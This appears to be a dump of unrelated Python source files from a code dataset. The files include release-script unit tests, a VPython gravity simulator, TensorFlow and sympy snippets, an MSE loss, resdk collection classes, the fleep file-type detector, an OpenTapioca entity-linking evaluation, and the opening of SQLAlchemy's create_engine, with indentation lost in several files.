process = subprocess.Popen(['test'], stdout=subprocess.PIPE)
def mock_isdir(unused_dirpath):
return False
def mock_chdir(unused_dirpath):
pass
# pylint: disable=unused-argument
def mock_popen(unused_cmd, stdin, stdout, stderr):
return process
# pylint: enable=unused-argument
def mock_communicate(unused_self):
return ('Output', 'You\'ve successfully authenticated!')
def mock_check_call(unused_cmd_tokens):
pass
def mock_verify_local_repo_is_clean():
pass
def mock_verify_current_branch_name(unused_branch_name):
pass
def mock_get_remote_alias(unused_url):
return 'remote'
isdir_swap = self.swap(os.path, 'isdir', mock_isdir)
chdir_swap = self.swap(os, 'chdir', mock_chdir)
popen_swap = self.swap(subprocess, 'Popen', mock_popen)
communicate_swap = self.swap(
subprocess.Popen, 'communicate', mock_communicate)
check_call_swap = self.swap(
subprocess, 'check_call', mock_check_call)
verify_local_repo_swap = self.swap(
common, 'verify_local_repo_is_clean',
mock_verify_local_repo_is_clean)
verify_current_branch_name_swap = self.swap(
common, 'verify_current_branch_name',
mock_verify_current_branch_name)
get_remote_alias_swap = self.swap(
common, 'get_remote_alias', mock_get_remote_alias)
with isdir_swap, chdir_swap, popen_swap, communicate_swap:
with check_call_swap, verify_local_repo_swap:
with verify_current_branch_name_swap, get_remote_alias_swap:
(
common
.ensure_release_scripts_folder_exists_and_is_up_to_date(
))
def test_is_port_open(self):
self.assertFalse(common.is_port_open(4444))
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(('', 4444), handler)
self.assertTrue(common.is_port_open(4444))
httpd.server_close()
def test_permissions_of_file(self):
root_temp_dir = tempfile.mkdtemp()
temp_dirpath = tempfile.mkdtemp(dir=root_temp_dir)
temp_file = tempfile.NamedTemporaryFile(dir=temp_dirpath)
temp_file.name = 'temp_file'
temp_file_path = os.path.join(temp_dirpath, 'temp_file')
with python_utils.open_file(temp_file_path, 'w') as f:
f.write('content')
common.recursive_chown(root_temp_dir, os.getuid(), -1)
common.recursive_chmod(root_temp_dir, 0o744)
for root, directories, filenames in os.walk(root_temp_dir):
for directory in directories:
self.assertEqual(
oct(stat.S_IMODE(
os.stat(os.path.join(root, directory)).st_mode)),
'0744')
self.assertEqual(
os.stat(os.path.join(root, directory)).st_uid, os.getuid())
for filename in filenames:
self.assertEqual(
oct(stat.S_IMODE(
os.stat(os.path.join(root, filename)).st_mode)), '0744')
self.assertEqual(
os.stat(os.path.join(root, filename)).st_uid, os.getuid())
shutil.rmtree(root_temp_dir)
def test_print_each_string_after_two_new_lines(self):
@contextlib.contextmanager
def _redirect_stdout(new_target):
"""Redirect stdout to the new target.
Args:
new_target: TextIOWrapper. The new target to which stdout is
redirected.
Yields:
TextIOWrapper. The new target.
"""
old_target = sys.stdout
sys.stdout = new_target
try:
yield new_target
finally:
sys.stdout = old_target
target_stdout = python_utils.string_io()
with _redirect_stdout(target_stdout):
common.print_each_string_after_two_new_lines([
'These', 'are', 'sample', 'strings.'])
self.assertEqual(
target_stdout.getvalue(), 'These\n\nare\n\nsample\n\nstrings.\n\n')
def test_install_npm_library(self):
def _mock_subprocess_check_call(unused_command):
"""Mocks subprocess.check_call() to create a temporary file instead
of the actual npm library.
"""
temp_file = tempfile.NamedTemporaryFile()
temp_file.name = 'temp_file'
with python_utils.open_file('temp_file', 'w') as f:
f.write('content')
self.assertTrue(os.path.exists('temp_file'))
temp_file.close()
self.assertFalse(os.path.exists('temp_file'))
with self.swap(subprocess, 'check_call', _mock_subprocess_check_call):
common.install_npm_library('library_name', 'version', 'path')
def test_ask_user_to_confirm(self):
def mock_input():
return 'Y'
with self.swap(python_utils, 'INPUT', mock_input):
common.ask_user_to_confirm('Testing')
def test_get_personal_access_token_with_valid_token(self):
# pylint: disable=unused-argument
def mock_getpass(prompt):
return 'token'
# pylint: enable=unused-argument
with self.swap(getpass, 'getpass', mock_getpass):
self.assertEqual(common.get_personal_access_token(), 'token')
def test_get_personal_access_token_with_token_as_none(self):
# pylint: disable=unused-argument
def mock_getpass(prompt):
return None
# pylint: enable=unused-argument
getpass_swap = self.swap(getpass, 'getpass', mock_getpass)
with getpass_swap, self.assertRaisesRegexp(
Exception,
'No personal access token provided, please set up a personal '
'access token at https://github.com/settings/tokens and re-run '
'the script'):
common.get_personal_access_token()
def test_closed_blocking_bugs_milestone_results_in_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'state': 'closed'}, completed='')
# pylint: enable=unused-argument
get_milestone_swap = self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone)
with get_milestone_swap, self.assertRaisesRegexp(
Exception, 'The blocking bug milestone is closed.'):
common.check_blocking_bug_issue_count(mock_repo)
def test_non_zero_blocking_bug_issue_count_results_in_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
def mock_open_tab(unused_url):
pass
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'open_issues': 10, 'state': 'open'}, completed='')
# pylint: enable=unused-argument
get_milestone_swap = self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone)
open_tab_swap = self.swap(
common, 'open_new_tab_in_browser_if_possible', mock_open_tab)
with get_milestone_swap, open_tab_swap, self.assertRaisesRegexp(
Exception, (
'There are 10 unresolved blocking bugs. Please '
'ensure that they are resolved before release '
'summary generation.')):
common.check_blocking_bug_issue_count(mock_repo)
def test_zero_blocking_bug_issue_count_results_in_no_exception(self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
# pylint: disable=unused-argument
def mock_get_milestone(unused_self, number):
return github.Milestone.Milestone(
requester='', headers='',
attributes={'open_issues': 0, 'state': 'open'}, completed='')
# pylint: enable=unused-argument
with self.swap(
github.Repository.Repository, 'get_milestone', mock_get_milestone):
common.check_blocking_bug_issue_count(mock_repo)
def test_check_prs_for_current_release_are_released_with_no_unreleased_prs(
self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
pull1 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR1', 'number': 1, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
pull2 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR2', 'number': 2, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
label = github.Label.Label(
requester='', headers='',
attributes={
'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS},
completed='')
# pylint: disable=unused-argument
def mock_get_issues(unused_self, state, labels):
return [pull1, pull2]
# pylint: enable=unused-argument
def mock_get_label(unused_self, unused_name):
return [label]
get_issues_swap = self.swap(
github.Repository.Repository, 'get_issues', mock_get_issues)
get_label_swap = self.swap(
github.Repository.Repository, 'get_label', mock_get_label)
with get_issues_swap, get_label_swap:
common.check_prs_for_current_release_are_released(mock_repo)
def test_check_prs_for_current_release_are_released_with_unreleased_prs(
self):
mock_repo = github.Repository.Repository(
requester='', headers='', attributes={}, completed='')
def mock_open_tab(unused_url):
pass
pull1 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR1', 'number': 1, 'labels': [
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
pull2 = github.PullRequest.PullRequest(
requester='', headers='',
attributes={
'title': 'PR2', 'number': 2, 'labels': [
{'name': release_constants.LABEL_FOR_RELEASED_PRS},
{'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS}]},
completed='')
label = github.Label.Label(
requester='', headers='',
attributes={
'name': release_constants.LABEL_FOR_CURRENT_RELEASE_PRS},
completed='')
# pylint: disable=unused-argument
def mock_get_issues(unused_self, state, labels):
return [pull1, pull2]
# pylint: enable=unused-argument
def mock_get_label(unused_self, unused_name):
return [label]
get_issues_swap = self.swap(
github.Repository.Repository, 'get_issues', mock_get_issues)
get_label_swap = self.swap(
github.Repository.Repository, 'get_label', mock_get_label)
open_tab_swap = self.swap(
common, 'open_new_tab_in_browser_if_possible', mock_open_tab)
with get_issues_swap, get_label_swap, open_tab_swap:
with self.assertRaisesRegexp(
Exception, (
'There are PRs for current release which do not '
'have a \'%s\' label. Please ensure that '
'they are released before release summary '
'generation.') % (
release_constants.LABEL_FOR_RELEASED_PRS)):
common.check_prs_for_current_release_are_released(mock_repo)
def test_kill_processes_based_on_regex(self):
killed = []
def mock_kill(p):
killed.append(MockPsutilProcess.cmdlines[p.index])
def mock_cmdlines(p):
return MockPsutilProcess.cmdlines[p.index]
def mock_process_iter():
return [MockPsutilProcess(0), MockPsutilProcess(1)]
process_iter_swap = self.swap_with_checks(
psutil, 'process_iter', mock_process_iter)
kill_swap = self.swap(MockPsutilProcess, 'kill', mock_kill)
cmdlines_swap = self.swap(MockPsutilProcess, 'cmdline', mock_cmdlines)
with process_iter_swap, kill_swap, cmdlines_swap:
common.kill_processes_based_on_regex(r'.*dev_appserver\.py')
self.assertEqual(killed, [MockPsutilProcess.cmdlines[0]])
def test_kill_processes_based_on_regex_when_access_denied(self):
killed = []
def mock_kill(p):
killed.append(MockPsutilProcess.cmdlines[p.index])
def mock_cmdlines(p):
if p.index == 0:
raise psutil.AccessDenied()
return MockPsutilProcess.cmdlines[p.index]
def mock_process_iter():
return [MockPsutilProcess(0), MockPsutilProcess(1)]
process_iter_swap = self.swap_with_checks(
psutil, 'process_iter', mock_process_iter)
kill_swap = self.swap(MockPsutilProcess, 'kill', mock_kill)
cmdlines_swap = self.swap(MockPsutilProcess, 'cmdline', mock_cmdlines)
with process_iter_swap, kill_swap, cmdlines_swap:
common.kill_processes_based_on_regex(r'.*dev_appserver\.py')
self.assertEqual(killed, [])
def test_kill_process_when_psutil_not_in_path(self):
path_swap = self.swap(sys, 'path', [])
def mock_process_iter():
return []
process_iter_swap = self.swap(psutil, 'process_iter', mock_process_iter)
with path_swap, process_iter_swap:
common.kill_processes_based_on_regex('')
def test_inplace_replace_file(self):
origin_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json')
backup_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json.bak')
expected_lines = [
'{\n',
' "RANDMON1" : "randomValue1",\n',
' "312RANDOM" : "ValueRanDom2",\n',
' "DEV_MODE": true,\n',
' "RAN213DOM" : "raNdoVaLue3"\n',
'}\n'
]
def mock_remove(unused_file):
return
remove_swap = self.swap_with_checks(
os, 'remove', mock_remove, expected_args=[(backup_file,)]
)
with remove_swap:
common.inplace_replace_file(
origin_file, '"DEV_MODE": .*', '"DEV_MODE": true,')
with python_utils.open_file(origin_file, 'r') as f:
self.assertEqual(expected_lines, f.readlines())
# Revert the file.
os.remove(origin_file)
shutil.move(backup_file, origin_file)
def test_inplace_replace_file_with_exception_raised(self):
origin_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json')
backup_file = os.path.join(
'core', 'tests', 'data', 'inplace_replace_test.json.bak')
with python_utils.open_file(origin_file, 'r') as f:
origin_content = f.readlines()
def mock_compile(unused_arg):
raise ValueError
compile_swap = self.swap_with_checks(re, 'compile', mock_compile)
with self.assertRaises(ValueError), compile_swap:
common.inplace_replace_file(
origin_file, '"DEV_MODE": .*', '"DEV_MODE": true,')
self.assertFalse(os.path.isfile(backup_file))
with python_utils.open_file(origin_file, 'r') as f:
new_content = f.readlines()
self.assertEqual(origin_content, new_content)
def test_convert_to_posixpath_on_windows(self):
def mock_is_windows():
return True
is_windows_swap = self.swap(common, 'is_windows_os', mock_is_windows)
original_filepath = 'c:\\path\\to\\a\\file.js'
with is_windows_swap:
actual_file_path = common.convert_to_posixpath(original_filepath)
self.assertEqual(actual_file_path, 'c:/path/to/a/file.js')
def test_convert_to_posixpath_on_platform_other_than_windows(self):
def mock_is_windows():
return False
is_windows_swap = self.swap(common, 'is_windows_os', mock_is_windows)
original_filepath = 'c:\\path\\to\\a\\file.js'
with is_windows_swap:
actual_file_path = common.convert_to_posixpath(original_filepath)
self.assertEqual(actual_file_path, original_filepath)
def test_create_readme(self):
try:
os.makedirs('readme_test_dir')
common.create_readme('readme_test_dir', 'Testing readme.')
with python_utils.open_file('readme_test_dir/README.md', 'r') as f:
self.assertEqual(f.read(), 'Testing readme.')
finally:
if os.path.exists('readme_test_dir'):
shutil.rmtree('readme_test_dir')
|
py | b4033650fcafdf08c90f207a05e80cc44d34b462 | from __future__ import division
from visual import *
'''
.----------------.
| >>> vPhysics |
| >>> By CKB |
|______A___A_____|
( )
( ) )
[#######]
This package is an application of VPython, an awesome Python visualization package
developed by David Scherer and others.
This package is designed to do all of the physics simulation automatically:
you only need to declare the objects.
'''
#grav_const = 6.67E-11
grav_const = 1.
class PhysicScene():
def __init__(self, title, dt, display=None):
self.title = title
self.objects = []
self.dt = dt
self.display = display
self.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.objects))
def update_special_objs(self):
self.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.objects))
def update(self):
field = ForceFieldFunction(self.grav_objs)
        for obj in self.grav_objs:
            obj.acc = vector(field(obj.pos))
            ##print obj.acc
            obj.OnUpdate(self.dt)
class __BasePhysicObj(object):
def __init__(self, scene, pos=vector(0), v=vector(0), color=(1,1,1), material=None):
self.scene = scene
self.acc = vector(0)
self.pos, self.v = pos, v
self.scene.objects.append(self)
self.color = color
self.material = material
class GravObj(__BasePhysicObj):
"""docstring for GravObj"""
def __init__(self,
mass,
do_gravity, # to calculate the gravity caused by the obj
scene, make_trail=False, pos=vector(0), v=vector(0), radius = 'auto',
color=color.white, material = None):
#__BasePhysicObj.__init__()
super(GravObj, self).__init__(scene, pos, v, color, material)
self.mass = mass
self.do_gravity = do_gravity
# add self into parent scene grav list
self.scene.update_special_objs()
#self.scene.grav_objs = list(filter(lambda obj: obj.__class__ == GravObj, self.scene.objects))
if radius == 'auto':
self.radius = self.mass**(1./3)
else:
self.radius = radius
# appearance in vpython scene
self.visual = sphere(radius=self.radius, pos = self.pos, make_trail = make_trail, retain = 1000,
color = self.color, material = self.material)
def OnUpdate(self, dt):
self.v += self.acc * dt
self.pos += self.v * dt
self.visual.pos = self.pos
##print(self.acc)
def ForceFieldFunction(grav_objs):
global grav_const
grav_objs = [obj for obj in grav_objs if obj.do_gravity]
#GM = array([grav_const * obj.mass for obj in grav_objs])
def getAcc(p):
acc_sum = vector(0)
for obj in grav_objs:
GM = grav_const * obj.mass
R = obj.pos-p
#print "R: ",R
R3 = abs(R)**3
#print "R3: ",R3
if R3 > 0:
acc = R*(GM/R3)
#print "acc: ", acc
#print "acc sum0: ", acc_sum
acc_sum += acc
#print "acc sum1: ", acc_sum
#print "acc sum: ", acc_sum
#print "---"
return(acc_sum)
return getAcc
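# A minimal usage sketch (not part of the original module): two bodies under
# mutual gravity. It assumes classic VPython ('visual') is importable, since
# vector and rate come from the star import at the top of this file.
if __name__ == '__main__':
    demo_scene = PhysicScene(title='two-body demo', dt=0.01)
    # Heavy central body and a light satellite on a roughly circular orbit
    # (v ~ sqrt(grav_const * M / d) = sqrt(1000 / 20) ~ 7).
    GravObj(1000., True, demo_scene, make_trail=True, pos=vector(0, 0, 0),
            v=vector(0, 0, 0))
    GravObj(1., True, demo_scene, make_trail=True, pos=vector(20, 0, 0),
            v=vector(0, 7, 0))
    while True:
        rate(100)            # frame-rate limiter provided by visual
        demo_scene.update()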
|
py | b40336ecb807855f30d17701d3b92ea713d07ffe | from __future__ import print_function
import tensorflow as tf
import numpy as np
from tf_grouping import query_ball_point, group_point
class GroupPointTest(tf.test.TestCase):
def test(self):
pass
def test_grad(self):
with tf.device('/gpu:0'):
points = tf.constant(np.random.random((1,128,16)).astype('float32'))
print(points)
xyz1 = tf.constant(np.random.random((1,128,3)).astype('float32'))
xyz2 = tf.constant(np.random.random((1,8,3)).astype('float32'))
radius = 0.3
nsample = 32
idx, pts_cnt = query_ball_point(radius, nsample, xyz1, xyz2)
grouped_points = group_point(points, idx)
print(grouped_points)
with self.test_session():
print("---- Going to compute gradient error")
err = tf.test.compute_gradient_error(points, (1,128,16), grouped_points, (1,8,32,16))
print(err)
self.assertLess(err, 1e-4)
if __name__=='__main__':
tf.test.main()
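# Shape conventions, inferred from the gradient check above (a sketch, not
# taken from the tf_grouping documentation): with points of shape (B, N, C),
# xyz1 of shape (B, N, 3) and xyz2 of shape (B, M, 3),
#   idx, pts_cnt = query_ball_point(radius, nsample, xyz1, xyz2)
#       idx:     (B, M, nsample)  indices of neighbours within `radius`
#       pts_cnt: (B, M)           number of unique neighbours found
#   group_point(points, idx) -> (B, M, nsample, C)
# Here B=1, N=128, M=8, C=16 and nsample=32, matching the (1, 8, 32, 16)
# shape passed to compute_gradient_error above.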
|
py | b40336f1cb19a5c0a88d2d096703a4cd609809c5 | import sympy as sym
from sympy.utilities.lambdify import lambdify
import numpy as np
import math
#%%
beta = sym.Symbol('beta')
Re = sym.Symbol('Re')
r = sym.Symbol('r') #R/Re
e = sym.Symbol('e')
R = Re*r
#beta=1
F = R - beta * Re * (1-e**(-R/Re))
# Compute the derivatives
F_R = sym.diff(F,r)/Re
F_2R = sym.diff(F_R,r)/Re
gamma = F_R/(R*F_2R)
print(gamma)
print(sym.simplify(gamma))
# Scratch evaluations of e**2 below; their values are only displayed when the
# file is run cell-by-cell (note the #%% marker above), not as a script.
math.e
math.e**2
np.e**2
np.exp(2)
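# A quick numeric check (a sketch, not part of the original analysis): use the
# lambdify imported above to turn the symbolic gamma into a numpy function.
# gamma should not depend on Re (it cancels analytically), so any positive
# value can be passed for it.
gamma_num = lambdify((r, e, beta, Re), gamma, 'numpy')
print(gamma_num(1.0, np.e, 1.0, 1.0))  # gamma at R = Re for beta = 1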
|
py | b40337a36fc503cd7500e065b757cd9ccfcef607 | """
A loss function measures how good our predictions are.
We can use this to adjust the parameters of our network.
"""
import numpy as np
from monet.tensor import Tensor
class Loss:
def loss(self, predicted: Tensor, actual: Tensor) -> float:
raise NotImplementedError()
def grad(self, predicted: Tensor, actual: Tensor) -> Tensor:
raise NotImplementedError()
class MSE(Loss):
"""
    MSE is mean squared error, although this implementation actually returns
    the total squared error (a sum rather than a mean); grad() below is
    consistent with that choice.
"""
def loss(self, predicted: Tensor, actual: Tensor) -> float:
return np.sum((predicted - actual) ** 2)
def grad(self, predicted: Tensor, actual: Tensor) -> Tensor:
return 2 * (predicted - actual)
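# A minimal sanity check (a sketch, not part of the library; Tensor is assumed
# here to behave as a plain numpy array, which is how it is used above).
if __name__ == "__main__":
    predicted = np.array([1.0, 2.0, 3.0])
    actual = np.array([1.0, 2.0, 5.0])
    mse = MSE()
    print(mse.loss(predicted, actual))  # 4.0, i.e. (3 - 5) ** 2
    print(mse.grad(predicted, actual))  # [ 0.  0. -4.]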
|
py | b40337b5e7ba6a744af122a566e6d20fdacda0da | """Collection resources."""
from __future__ import absolute_import, division, print_function, unicode_literals
import six
from resdk.shortcuts.collection import CollectionRelationsMixin
from .base import BaseResolweResource
from .descriptor import DescriptorSchema
from .utils import get_data_id, get_descriptor_schema_id, get_sample_id, is_descriptor_schema
class BaseCollection(BaseResolweResource):
"""Abstract collection resource.
One and only one of the identifiers (slug, id or model_data)
should be given.
:param resolwe: Resolwe instance
:type resolwe: Resolwe object
:param model_data: Resource model data
"""
#: lazy loaded list of data objects
_data = None
WRITABLE_FIELDS = ('description', 'settings', 'descriptor_schema',
'descriptor') + BaseResolweResource.WRITABLE_FIELDS
ALL_PERMISSIONS = ['view', 'download', 'add', 'edit', 'share', 'owner']
def __init__(self, resolwe, **model_data):
"""Initialize attributes."""
#: descriptor schema id in which data object is
self._descriptor_schema = None
#: (lazy loaded) descriptor schema object in which data object is
self._hydrated_descriptor_schema = None
#: a description
self.description = None
#: settings
self.settings = None
#: descriptor
self.descriptor = None
super(BaseCollection, self).__init__(resolwe, **model_data)
@property
def data(self):
"""Return list of attached Data objects."""
raise NotImplementedError('This should be implemented in subclass')
@property
def descriptor_schema(self):
"""Return descriptor schema assigned to the data object."""
if self._descriptor_schema is None:
return None
if self._hydrated_descriptor_schema is None:
if isinstance(self._descriptor_schema, int):
query_filters = {'id': self._descriptor_schema}
else:
query_filters = {'slug': self._descriptor_schema}
self._hydrated_descriptor_schema = self.resolwe.descriptor_schema.get(
ordering='-version', limit=1, **query_filters
)
return self._hydrated_descriptor_schema
@descriptor_schema.setter
def descriptor_schema(self, dschema):
"""Set collection to which relation belongs."""
        # On the single object endpoint the descriptor schema is already
        # hydrated, so it has to be transformed into a resource.
if isinstance(dschema, dict):
dschema = DescriptorSchema(resolwe=self.resolwe, **dschema)
self._descriptor_schema = get_descriptor_schema_id(dschema)
        # Save the descriptor schema if it is already hydrated; otherwise it
        # will be retrieved in the getter.
self._hydrated_descriptor_schema = dschema if is_descriptor_schema(dschema) else None
def update(self):
"""Clear cache and update resource fields from the server."""
self._hydrated_descriptor_schema = None
super(BaseCollection, self).update()
def _clear_data_cache(self):
"""Clear data cache."""
self._data = None
def add_data(self, *data):
"""Add ``data`` objects to the collection."""
data = [get_data_id(d) for d in data]
self.api(self.id).add_data.post({'ids': data})
self._clear_data_cache()
def remove_data(self, *data):
"""Remove ``data`` objects from the collection."""
data = [get_data_id(d) for d in data]
self.api(self.id).remove_data.post({'ids': data})
self._clear_data_cache()
def data_types(self):
"""Return a list of data types (process_type).
:rtype: List
"""
process_types = set(self.resolwe.api.data(id_).get()['process_type'] for id_ in self.data)
return sorted(process_types)
def files(self, file_name=None, field_name=None):
"""Return list of files in resource."""
file_list = []
for data in self.data:
file_list.extend(fname for fname in data.files(file_name=file_name,
field_name=field_name))
return file_list
def download(self, file_name=None, file_type=None, download_dir=None):
"""Download output files of associated Data objects.
Download files from the Resolwe server to the download
directory (defaults to the current working directory).
:param file_name: name of file
:type file_name: string
:param file_type: data object type
:type file_type: string
:param download_dir: download path
:type download_dir: string
:rtype: None
Collections can contain multiple Data objects and Data objects
can contain multiple files. All files are downloaded by default,
but may be filtered by file name or Data object type:
* re.collection.get(42).download(file_name='alignment7.bam')
        * re.collection.get(42).download(file_type='bam')
"""
files = []
if file_type and not isinstance(file_type, six.string_types):
raise ValueError("Invalid argument value `file_type`.")
for data in self.data:
data_files = data.files(file_name, file_type)
files.extend('{}/{}'.format(data.id, file_name) for file_name in data_files)
self.resolwe._download_files(files, download_dir) # pylint: disable=protected-access
def print_annotation(self):
"""Provide annotation data."""
raise NotImplementedError()
class Collection(CollectionRelationsMixin, BaseCollection):
"""Resolwe Collection resource.
One and only one of the identifiers (slug, id or model_data)
should be given.
:param resolwe: Resolwe instance
:type resolwe: Resolwe object
:param model_data: Resource model data
"""
endpoint = 'collection'
#: (lazy loaded) list of samples that belong to collection
_samples = None
#: (lazy loaded) list of relations that belong to collection
_relations = None
def update(self):
"""Clear cache and update resource fields from the server."""
self._data = None
self._samples = None
self._relations = None
super(Collection, self).update()
@property
def data(self):
"""Return list of data objects on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `data` attribute.')
if self._data is None:
self._data = self.resolwe.data.filter(collection=self.id)
return self._data
@property
def samples(self):
"""Return list of samples on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `samples` attribute.')
if self._samples is None:
self._samples = self.resolwe.sample.filter(collections=self.id)
return self._samples
@property
def relations(self):
"""Return list of data objects on collection."""
if self.id is None:
raise ValueError('Instance must be saved before accessing `relations` attribute.')
if self._relations is None:
self._relations = self.resolwe.relation.filter(collection=self.id)
return self._relations
def add_samples(self, *samples):
"""Add `samples` objects to the collection."""
samples = [get_sample_id(s) for s in samples]
# XXX: Make in one request when supported on API
for sample in samples:
self.resolwe.api.sample(sample).add_to_collection.post({'ids': [self.id]})
self.samples.clear_cache()
def remove_samples(self, *samples):
"""Remove ``sample`` objects from the collection."""
samples = [get_sample_id(s) for s in samples]
# XXX: Make in one request when supported on API
for sample in samples:
self.resolwe.api.sample(sample).remove_from_collection.post({'ids': [self.id]})
self.samples.clear_cache()
def print_annotation(self):
"""Provide annotation data."""
raise NotImplementedError()
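# Typical usage (a sketch based on the docstrings above; the exact Resolwe
# constructor arguments depend on the resdk version and the server used):
#
#     import resdk
#     res = resdk.Resolwe(url='https://app.genialis.com')  # hypothetical URL
#     collection = res.collection.get(42)
#     print(collection.data_types())
#     collection.download(file_type='bam', download_dir='.')
#
# ``res.collection.get(42)`` mirrors the example already shown in
# ``BaseCollection.download``.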
|
py | b403394d7e9dd8f20783f2ef34b01ce0f1aad1b6 | # -*- coding: utf-8 -*-
"""
Description: File format determination library
Author: Mykyta Paliienko
License: MIT
"""
import os
import json
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.json")) as data_file:
data = json.loads(data_file.read())
class Info:
"""
Generates object with given arguments
Takes:
type_ (list) -> list of file types
extension (list) -> list of file extensions
mime (list) -> list of file MIME types
Returns:
(<class 'fleep.Info'>) -> Class instance
"""
def __init__(self, type_, extension, mime):
self.type = type_
self.extension = extension
self.mime = mime
def type_matches(self, type_):
""" Checks if file type matches with given type """
return type_ in self.type
def extension_matches(self, extension):
""" Checks if file extension matches with given extension """
return extension in self.extension
def mime_matches(self, mime):
""" Checks if file MIME type matches with given MIME type """
return mime in self.mime
def get(obj):
"""
Determines file format and picks suitable file types, extensions and MIME types
Takes:
obj (bytes) -> byte sequence (128 bytes are enough)
Returns:
(<class 'fleep.Info'>) -> Class instance
"""
if not isinstance(obj, bytes):
raise TypeError("object type must be bytes")
info = {
"type": dict(),
"extension": dict(),
"mime": dict()
}
stream = " ".join(['{:02X}'.format(byte) for byte in obj])
for element in data:
for signature in element["signature"]:
            # Each byte is rendered as two hex digits plus a space, so byte
            # offset N corresponds to string offset 3 * N.
            offset = element["offset"] * 2 + element["offset"]
if signature == stream[offset:len(signature) + offset]:
for key in ["type", "extension", "mime"]:
info[key][element[key]] = len(signature)
for key in ["type", "extension", "mime"]:
info[key] = [element for element in sorted(info[key], key=info[key].get, reverse=True)]
return Info(info["type"], info["extension"], info["mime"])
def supported_types():
""" Returns a list of supported file types """
return sorted(set([x["type"] for x in data]))
def supported_extensions():
""" Returns a list of supported file extensions """
return sorted(set([x["extension"] for x in data]))
def supported_mimes():
""" Returns a list of supported file MIME types """
return sorted(set([x["mime"] for x in data]))
|
py | b40339983cd236987aa99f93ce1301c4a287ff68 | # -*- coding: utf-8 -*-
import requests
import csv
import evaluation
def open_tapioca_call(text):
# print(text)
text = text.replace('?', '')
headers = {
'Accept': 'application/json',
}
url = "https://opentapioca.org/api/annotate"
    payload = 'query='
    # Join the words with '+' and append a URL-encoded '?' ('%3F'),
    # producing e.g. 'query=What+is+X+%3F'.
    data = text.split(" ")
    for s in data:
        payload = payload + s
        payload += '+'
    payload += '%3F'
    payload = payload.encode("utf-8")
response = requests.request("POST", url, data=payload, headers=headers)
return response.json()
def evaluate(annotations, raw):
correctRelations = 0
wrongRelations = 0
correctEntities = 0
wrongEntities = 0
p_entity = 0
r_entity = 0
p_relation = 0
r_relation = 0
entities = []
for annotation in annotations:
if annotation['best_qid'] is not None:
entities.append(annotation['best_qid'])
else:
if len(annotation['tags']) != 0:
tags = sorted(annotation['tags'], key=lambda i: i['rank'], reverse=True)
entities.append(tags[0]['id'])
true_entity = raw[1]
numberSystemEntities = len(raw[1])
# print(true_entity, entities)
for e in true_entity:
if e in entities:
correctEntities = correctEntities + 1
else:
wrongEntities = wrongEntities + 1
intersection = set(true_entity).intersection(entities)
if len(entities) != 0:
p_entity = len(intersection) / len(entities)
r_entity = len(intersection) / numberSystemEntities
return [correctEntities, wrongEntities, p_entity, r_entity, entities]
if __name__ == "__main__":
result = []
result.append(["Question", "Gold Standard", "System", "P", "R"])
questions = evaluation.read_lcquad_2()
correct = 0
wrong = 0
i = 0
for question in questions:
try:
output = open_tapioca_call(question[0])
c, w, p, r, entities = evaluate(output['annotations'], question)
correct += c
wrong += w
# print(c)
result.append([question[0], question[1], entities, p, r])
print(str(i) + "#####" + str((correct * 100) / (correct + wrong)))
i = i + 1
except:
continue
print("total correct entities: ", correct)
print("Total wrong entities: ", wrong)
print("P:")
print((correct * 100) / (correct + wrong))
with open('../datasets/results/final/results_lcquad2_entities_OpenTapioca.csv', mode='w', newline='', encoding='utf-8') as results_file:
writer = csv.writer(results_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerows(result)
|
py | b4033ad76fd351270b9022725d900348e27c0c64 | # engine/create.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import base
from . import url as _url
from .mock import create_mock_engine
from .. import event
from .. import exc
from .. import pool as poollib
from .. import util
from ..sql import compiler
@util.deprecated_params(
strategy=(
"1.4",
"The :paramref:`_sa.create_engine.strategy` keyword is deprecated, "
"and the only argument accepted is 'mock'; please use "
":func:`.create_mock_engine` going forward. For general "
"customization of create_engine which may have been accomplished "
"using strategies, see :class:`.CreateEnginePlugin`.",
),
empty_in_strategy=(
"1.4",
"The :paramref:`_sa.create_engine.empty_in_strategy` keyword is "
"deprecated, and no longer has any effect. All IN expressions "
"are now rendered using "
'the "expanding parameter" strategy which renders a set of bound'
'expressions, or an "empty set" SELECT, at statement execution'
"time.",
),
case_sensitive=(
"1.4",
"The :paramref:`_sa.create_engine.case_sensitive` parameter "
"is deprecated and will be removed in a future release. "
"Applications should work with result column names in a case "
"sensitive fashion.",
),
)
def create_engine(url, **kwargs):
"""Create a new :class:`_engine.Engine` instance.
The standard calling form is to send the :ref:`URL <database_urls>` as the
first positional argument, usually a string
